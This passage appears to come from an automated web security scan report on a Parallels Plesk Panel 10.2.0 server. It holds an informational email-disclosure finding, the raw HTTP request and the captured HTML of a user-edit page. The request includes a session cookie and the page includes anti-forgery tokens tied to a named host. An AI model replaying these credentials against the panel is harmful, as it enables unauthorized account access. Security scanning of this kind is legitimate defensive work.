<option value="BO" label="Bolivia, Plurinational State of">Bolivia, Plurinational State of</option>
<option value="BA" label="Bosnia and Herzegovina">Bosnia and Herzegovina</option>
<option value="BW" label="Botswana">Botswana</option>
<option value="BV" label="Bouvet Island">Bouvet Island</option>
<option value="BR" label="Brazil">Brazil</option>
<option value="IO" label="British Indian Ocean Territory">British Indian Ocean Territory</option>
<option value="BN" label="Brunei Darussalam">Brunei Darussalam</option>
<option value="BG" label="Bulgaria">Bulgaria</option>
<option value="BF" label="Burkina Faso">Burkina Faso</option>
<option value="BI" label="Burundi">Burundi</option>
<option value="KH" label="Cambodia">Cambodia</option>
<option value="CM" label="Cameroon">Cameroon</option>
<option value="CA" label="Canada">Canada</option>
<option value="CV" label="Cape Verde">Cape Verde</option>
<option value="KY" label="Cayman Islands">Cayman Islands</option>
<option value="CF" label="Central African Republic">Central African Republic</option>
<option value="TD" label="Chad">Chad</option>
<option value="CL" label="Chile">Chile</option>
<option value="CN" label="China">China</option>
<option value="CX" label="Christmas Island">Christmas Island</option>
<option value="CC" label="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option>
<option value="CO" label="Colombia">Colombia</option>
<option value="KM" label="Comoros">Comoros</option>
<option value="CG" label="Congo">Congo</option>
<option value="CD" label="Congo, the Democratic Republic of the">Congo, the Democratic Republic of the</option>
<option value="CK" label="Cook Islands">Cook Islands</option>
<option value="CR" label="Costa Rica">Costa Rica</option>
<option value="CI" label="Cote D'Ivoire">Cote D'Ivoire</option>
<option value="HR" label="Croatia">Croatia</option>
<option value="CU" label="Cuba">Cuba</option>
<option value="CY" label="Cyprus">Cyprus</option>
<option value="CZ" label="Czech Republic">Czech Republic</option>
<option value="DK" label="Denmark">Denmark</option>
<option value="DJ" label="Djibouti">Djibouti</option>
<option value="DM" label="Dominica">Dominica</option>
<option value="DO" label="Dominican Republic">Dominican Republic</option>
<option value="EC" label="Ecuador">Ecuador</option>
<option value="EG" label="Egypt">Egypt</option>
<option value="SV" label="El Salvador">El Salvador</option>
<option value="GQ" label="Equatorial Guinea">Equatorial Guinea</option>
<option value="ER" label="Eritrea">Eritrea</option>
<option value="EE" label="Estonia">Estonia</option>
<option value="ET" label="Ethiopia">Ethiopia</option>
<option value="FK" label="Falkland Islands (Malvinas)">Falkland Islands (Malvinas)</option>
<option value="FO" label="Faroe Islands">Faroe Islands</option>
<option value="FJ" label="Fiji">Fiji</option>
<option value="FI" label="Finland">Finland</option>
<option value="FR" label="France">France</option>
<option value="GF" label="French Guiana">French Guiana</option>
<option value="PF" label="French Polynesia">French Polynesia</option>
<option value="TF" label="French Southern Territories">French Southern Territories</option>
<option value="GA" label="Gabon">Gabon</option>
<option value="GM" label="Gambia">Gambia</option>
<option value="GE" label="Georgia">Georgia</option>
<option value="DE" label="Germany">Germany</option>
<option value="GH" label="Ghana">Ghana</option>
<option value="GI" label="Gibraltar">Gibraltar</option>
<option value="GR" label="Greece">Greece</option>
<option value="GL" label="Greenland">Greenland</option>
<option value="GD" label="Grenada">Grenada</option>
<option value="GP" label="Guadeloupe">Guadeloupe</option>
<option value="GU" label="Guam">Guam</option>
<option value="GT" label="Guatemala">Guatemala</option>
<option value="GG" label="Guernsey">Guernsey</option>
<option value="GN" label="Guinea">Guinea</option>
<option value="GW" label="Guinea-Bissau">Guinea-Bissau</option>
<option value="GY" label="Guyana">Guyana</option>
<option value="HT" label="Haiti">Haiti</option>
<option value="HM" label="Heard Island and McDonald Islands">Heard Island and McDonald Islands</option>
<option value="VA" label="Holy See (Vatican City State)">Holy See (Vatican City State)</option>
<option value="HN" label="Honduras">Honduras</option>
<option value="HK" label="Hong Kong">Hong Kong</option>
<option value="HU" label="Hungary">Hungary</option>
<option value="IS" label="Iceland">Iceland</option>
<option value="IN" label="India">India</option>
<option value="ID" label="Indonesia">Indonesia</option>
<option value="IR" label="Iran, Islamic Republic of">Iran, Islamic Republic of</option>
<option value="IQ" label="Iraq">Iraq</option>
<option value="IE" label="Ireland">Ireland</option>
<option value="IM" label="Isle of Man">Isle of Man</option>
<option value="IL" label="Israel">Israel</option>
<option value="IT" label="Italy">Italy</option>
<option value="JM" label="Jamaica">Jamaica</option>
<option value="JP" label="Japan">Japan</option>
<option value="JE" label="Jersey">Jersey</option>
<option value="JO" label="Jordan">Jordan</option>
<option value="KZ" label="Kazakhstan">Kazakhstan</option>
<option value="KE" label="Kenya">Kenya</option>
<option value="KI" label="Kiribati">Kiribati</option>
<option value="KP" label="Korea, Democratic People's Republic of">Korea, Democratic People's Republic of</option>
<option value="KR" label="Korea, Republic of">Korea, Republic of</option>
<option value="KW" label="Kuwait">Kuwait</option>
<option value="KG" label="Kyrgyzstan">Kyrgyzstan</option>
<option value="LA" label="Lao People's Democratic Republic">Lao People's Democratic Republic</option>
<option value="LV" label="Latvia">Latvia</option>
<option value="LB" label="Lebanon">Lebanon</option>
<option value="LS" label="Lesotho">Lesotho</option>
<option value="LR" label="Liberia">Liberia</option>
<option value="LY" label="Libyan Arab Jamahiriya">Libyan Arab Jamahiriya</option>
<option value="LI" label="Liechtenstein">Liechtenstein</option>
<option value="LT" label="Lithuania">Lithuania</option>
<option value="LU" label="Luxembourg">Luxembourg</option>
<option value="MO" label="Macao">Macao</option>
<option value="MK" label="Macedonia, the Former Yugoslav Republic of">Macedonia, the Former Yugoslav Republic of</option>
<option value="MG" label="Madagascar">Madagascar</option>
<option value="MW" label="Malawi">Malawi</option>
<option value="MY" label="Malaysia">Malaysia</option>
<option value="MV" label="Maldives">Maldives</option>
<option value="ML" label="Mali">Mali</option>
<option value="MT" label="Malta">Malta</option>
<option value="MH" label="Marshall Islands">Marshall Islands</option>
<option value="MQ" label="Martinique">Martinique</option>
<option value="MR" label="Mauritania">Mauritania</option>
<option value="MU" label="Mauritius">Mauritius</option>
<option value="YT" label="Mayotte">Mayotte</option>
<option value="MX" label="Mexico">Mexico</option>
<option value="FM" label="Micronesia, Federated States of">Micronesia, Federated States of</option>
<option value="MD" label="Moldova, Republic of">Moldova, Republic of</option>
<option value="MC" label="Monaco">Monaco</option>
<option value="MN" label="Mongolia">Mongolia</option>
<option value="ME" label="Montenegro">Montenegro</option>
<option value="MS" label="Montserrat">Montserrat</option>
<option value="MA" label="Morocco">Morocco</option>
<option value="MZ" label="Mozambique">Mozambique</option>
<option value="MM" label="Myanmar">Myanmar</option>
<option value="NA" label="Namibia">Namibia</option>
<option value="NR" label="Nauru">Nauru</option>
<option value="NP" label="Nepal">Nepal</option>
<option value="NL" label="Netherlands">Netherlands</option>
<option value="AN" label="Netherlands Antilles">Netherlands Antilles</option>
<option value="NC" label="New Caledonia">New Caledonia</option>
<option value="NZ" label="New Zealand">New Zealand</option>
<option value="NI" label="Nicaragua">Nicaragua</option>
<option value="NE" label="Niger">Niger</option>
<option value="NG" label="Nigeria">Nigeria</option>
<option value="NU" label="Niue">Niue</option>
<option value="NF" label="Norfolk Island">Norfolk Island</option>
<option value="MP" label="Northern Mariana Islands">Northern Mariana Islands</option>
<option value="NO" label="Norway">Norway</option>
<option value="OM" label="Oman">Oman</option>
<option value="PK" label="Pakistan">Pakistan</option>
<option value="PW" label="Palau">Palau</option>
<option value="PS" label="Palestinian Territory, Occupied">Palestinian Territory, Occupied</option>
<option value="PA" label="Panama">Panama</option>
<option value="PG" label="Papua New Guinea">Papua New Guinea</option>
<option value="PY" label="Paraguay">Paraguay</option>
<option value="PE" label="Peru">Peru</option>
<option value="PH" label="Philippines">Philippines</option>
<option value="PN" label="Pitcairn">Pitcairn</option>
<option value="PL" label="Poland">Poland</option>
<option value="PT" label="Portugal">Portugal</option>
<option value="PR" label="Puerto Rico">Puerto Rico</option>
<option value="QA" label="Qatar">Qatar</option>
<option value="RE" label="Reunion">Reunion</option>
<option value="RO" label="Romania">Romania</option>
<option value="RU" label="Russian Federation">Russian Federation</option>
<option value="RW" label="Rwanda">Rwanda</option>
<option value="BL" label="Saint Barthelemy">Saint Barthelemy</option>
<option value="SH" label="Saint Helena, Ascension and Tristan da Cunha">Saint Helena, Ascension and Tristan da Cunha</option>
<option value="KN" label="Saint Kitts and Nevis">Saint Kitts and Nevis</option>
<option value="LC" label="Saint Lucia">Saint Lucia</option>
<option value="MF" label="Saint Martin">Saint Martin</option>
<option value="PM" label="Saint Pierre and Miquelon">Saint Pierre and Miquelon</option>
<option value="VC" label="Saint Vincent and the Grenadines">Saint Vincent and the Grenadines</option>
<option value="WS" label="Samoa">Samoa</option>
<option value="SM" label="San Marino">San Marino</option>
<option value="ST" label="Sao Tome and Principe">Sao Tome and Principe</option>
<option value="SA" label="Saudi Arabia">Saudi Arabia</option>
<option value="SN" label="Senegal">Senegal</option>
<option value="RS" label="Serbia">Serbia</option>
<option value="SC" label="Seychelles">Seychelles</option>
<option value="SL" label="Sierra Leone">Sierra Leone</option>
<option value="SG" label="Singapore">Singapore</option>
<option value="SK" label="Slovakia">Slovakia</option>
<option value="SI" label="Slovenia">Slovenia</option>
<option value="SB" label="Solomon Islands">Solomon Islands</option>
<option value="SO" label="Somalia">Somalia</option>
<option value="ZA" label="South Africa">South Africa</option>
<option value="GS" label="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option>
<option value="ES" label="Spain">Spain</option>
<option value="LK" label="Sri Lanka">Sri Lanka</option>
<option value="SD" label="Sudan">Sudan</option>
<option value="SR" label="Suriname">Suriname</option>
<option value="SJ" label="Svalbard and Jan Mayen">Svalbard and Jan Mayen</option>
<option value="SZ" label="Swaziland">Swaziland</option>
<option value="SE" label="Sweden">Sweden</option>
<option value="CH" label="Switzerland">Switzerland</option>
<option value="SY" label="Syrian Arab Republic">Syrian Arab Republic</option>
<option value="TW" label="Taiwan">Taiwan</option>
<option value="TJ" label="Tajikistan">Tajikistan</option>
<option value="TZ" label="Tanzania, United Republic of">Tanzania, United Republic of</option>
<option value="TH" label="Thailand">Thailand</option>
<option value="TL" label="Timor-Leste">Timor-Leste</option>
<option value="TG" label="Togo">Togo</option>
<option value="TK" label="Tokelau">Tokelau</option>
<option value="TO" label="Tonga">Tonga</option>
<option value="TT" label="Trinidad and Tobago">Trinidad and Tobago</option>
<option value="TN" label="Tunisia">Tunisia</option>
<option value="TR" label="Turkey">Turkey</option>
<option value="TM" label="Turkmenistan">Turkmenistan</option>
<option value="TC" label="Turks and Caicos Islands">Turks and Caicos Islands</option>
<option value="TV" label="Tuvalu">Tuvalu</option>
<option value="UG" label="Uganda">Uganda</option>
<option value="UA" label="Ukraine">Ukraine</option>
<option value="AE" label="United Arab Emirates">United Arab Emirates</option>
<option value="GB" label="United Kingdom">United Kingdom</option>
<option value="US" label="United States" selected="selected">United States</option>
<option value="UM" label="United States Minor Outlying Islands">United States Minor Outlying Islands</option>
<option value="UY" label="Uruguay">Uruguay</option>
<option value="UZ" label="Uzbekistan">Uzbekistan</option>
<option value="VU" label="Vanuatu">Vanuatu</option>
<option value="VE" label="Venezuela, Bolivarian Republic of">Venezuela, Bolivarian Republic of</option>
<option value="VN" label="Viet Nam">Viet Nam</option>
<option value="VG" label="Virgin Islands, British">Virgin Islands, British</option>
<option value="VI" label="Virgin Islands, U.S.">Virgin Islands, U.S.</option>
<option value="WF" label="Wallis and Futuna">Wallis and Futuna</option>
<option value="EH" label="Western Sahara">Western Sahara</option>
<option value="YE" label="Yemen">Yemen</option>
<option value="ZM" label="Zambia">Zambia</option>
<option value="ZW" label="Zimbabwe">Zimbabwe</option>
</select>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'contacts-contactsSection'
});
});
//]]>
</script>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/user/list"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="bdaafe67daaa200e2f077bd9577b09f4" id="form_forgery_protection_token" /></form>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.FormAjax({
applyTo: 'form-user',
waitButtonTitle: 'Please wait'
})
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

11.10. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/4

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/edit/id/4

Issue detail

The following email address was disclosed in the response:

Request

GET /smb/user/edit/id/4 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/user/list
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:29:11 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:29:11 GMT
Connection: close
Content-Length: 45522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>format-1 - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/user/action-name/edit" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fuser%2Fedit%2Fid%2F4' + '&activeModule=' + 'users' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"active","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/user/list">
<span>Up Level</span>
</a>
</div>
<h2><span><b>format-1</b></span></h2>
</div>
</div>


<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Smb.UserEditForm = Class.create({

initialize: function(config) {

if (!$('general-account-loginString')) {
return;
}

if ($('general-vcard-email-emailType-internal')) {
$('general-vcard-email-emailType-internal').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-internalEmail')) {
$('general-vcard-email-internalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-internalEmail').observe('change', this._generateLogin.bind(this));
}
if ($('general-vcard-email-domain')) {
$('general-vcard-email-domain').observe('change', this._generateLogin.bind(this));
}

if ($('general-vcard-email-emailType-external')) {
$('general-vcard-email-emailType-external').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-externalEmail')) {
$('general-vcard-email-externalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-externalEmail').observe('change', this._generateLogin.bind(this));
}
},

_generateLogin: function() {
if ($('general-vcard-email-emailType-internal') && $('general-vcard-email-emailType-internal').checked) {
var loginString = $('general-vcard-email-internalEmail').value;
if ('' == loginString) {
//empty username
} else
if ($('general-vcard-email-domain')) {
loginString += '@' + $('general-vcard-email-domain').options[$('general-vcard-email-domain').selectedIndex].text;
} else {
loginString += '@' + $('general-vcard-email-internalEmail-domain').innerHTML;
}
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-emailType-external') && $('general-vcard-email-emailType-external').checked) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-externalEmail')) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
}
}
});

Jsw.onReady(function() {
new Smb.UserEditForm();
});
//]]>
</script><form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'></div><script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.bar.Tabs({
type: 'dynamic',
applyTo: 'form-tab-buttons',
items: [{"componentType":"Jsw.bar.Button","title":"General","tabId":"tab-general","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Contact Details","tabId":"tab-contacts","containerCls":""}]
});
});
</script>

<div id='tab-general' >

<div id='general-vcard' class='form-box' >
<div id='general-vcard-content-area'>
<div id='general-vcard-contactName-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-contactName'>Contact name&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="general[vcard][contactName]" id="general-vcard-contactName" value="format-1" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div class="form-row">
<div class='field-name'>
<label for='general-vcard-email-emailType'>E-mail address which is also used as a username for logging in to the Panel&nbsp;</label> <span class="required">*</span>
</div>
<div class="field-value">
<div class="text-value">
<div class="indent-box">

<span><input type="radio" class="radio"
value="internal"
id="general-vcard-email-emailType-internal"
name="general[vcard][email][emailType]"
checked="checked" /></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-internal">Create an e-mail address under your account</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][internalEmail]" id="general-vcard-email-internalEmail" value="fdf080d9224fd0d18957a62c" class="input-text" /> @<span id='general-vcard-email-internalEmail-domain'>vulnerable.host.fqdn</span></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
<div class="indent-box">

<span><input type="radio" class="radio"
value="external"
id="general-vcard-email-emailType-external"
name="general[vcard][email][emailType]"
/></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-external">Use an external e-mail address</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][externalEmail]" id="general-vcard-email-externalEmail" value="fdf080d9224fd0d18957a62c@vulnerable.host.fqdn" class="f-middle-size input-text" disabled="1" /></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Smb.UserEmailForm = Class.create({

initialize: function(config) {
this._prefix = config['prefix'];
this._internalEmailId = this._prefix + config['internalEmailId'];
this._internalEmailElements = config['internalEmailElements'];
this._externalEmailId = this._prefix + config['externalEmailId'];
this._externalEmailElements = config['externalEmailElements'];
$(this._internalEmailId).observe('click', this._internalEmailOnClick.bind(this));
$(this._externalEmailId).observe('click', this._externalEmailOnClick.bind(this));
if ($(this._internalEmailId).checked) {
this._internalEmailOnClick();
} else {
   this._externalEmailOnClick();
}
},

_internalEmailOnClick: function() {
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
},

_externalEmailOnClick: function() {
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
}
});

Jsw.onReady(function() {
new Smb.UserEmailForm({
prefix: 'general-vcard-email-',
internalEmailId: 'emailType-internal',
internalEmailElements: ['internalEmail'
],
externalEmailId: 'emailType-external',
externalEmailElements: ['externalEmail']
});

});
//]]>
</script>


<div id='general-vcard-roleId-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-roleId'>User role&nbsp;</label></div>
<div class='field-value'>

<select name="general[vcard][roleId]" id="general-vcard-roleId">
<option value="5" label="Owner">Owner</option>
<option value="6" label="WebMaster">WebMaster</option>
<option value="7" label="Application User" selected="selected">Application User</option>
<option value="8" label="Accountant">Accountant</option>
</select>
<span class='field-errors' style="display:none;"></span>
<span class="hint">User roles grant users administrative privileges and access to applications that you selected for the role.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'General Information',
applyTo: 'general-vcard'
});
});
//]]>
</script>


<div id='general-account' class='form-box' >
<div id='general-account-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-account-loginString'>Username&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-account-loginString'>fdf080d9224fd0d18957a62c@vulnerable.host.fqdn</span>

</div>
</div>
</div>
<div id='general-account-password-form-row' class='form-row' >
<div class='field-name'><label for='general-account-password'>Password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][password]" id="general-account-password" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-account-password');
new Jsw.PasswordMeter({
renderTo: 'general-account-password',
renderMode: 'after',
observe: 'general-account-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-account-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-account-passwordConfirmation'>Confirm password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>

<div class='form-row'>
<div class='single-row'>
<div class='indent-box'>

<input type="hidden" name="general[account][isActive]" value="0" /><input type="checkbox" name="general[account][isActive]" id="general-account-isActive" value="1" checked="checked" class="checkbox" />
<div class='indent-box-content'>
<label for='general-account-isActive'>User is active&nbsp;</label>
<span class="hint">Active users can access the Panel.</span>
</div>
</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'Panel Preferences',
applyTo: 'general-account'
});
});
//]]>
</script>
</div>
<div id='tab-contacts' style="display: none;">

<div id='contacts-contactsSection' class='form-box' >
<div id='contacts-contactsSection-content-area'>
<div id='contacts-contactsSection-companyName-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-companyName'>Company name&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][companyName]" id="contacts-contactsSection-companyName" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-phone-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-phone'>Phone number&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][phone]" id="contacts-contactsSection-phone" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-fax-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-fax'>Fax number&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][fax]" id="contacts-contactsSection-fax" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-address-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-address'>Address&nbsp;</label></div>
<div class='field-value'>

<textarea name="contacts[contactsSection][address]" id="contacts-contactsSection-address" class="f-middle-size" rows="4" cols="80"></textarea>
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-city-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-city'>City&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][city]" id="contacts-contactsSection-city" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-state-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-state'>State or province&nbsp;</label></div>
<div class='field-value'>

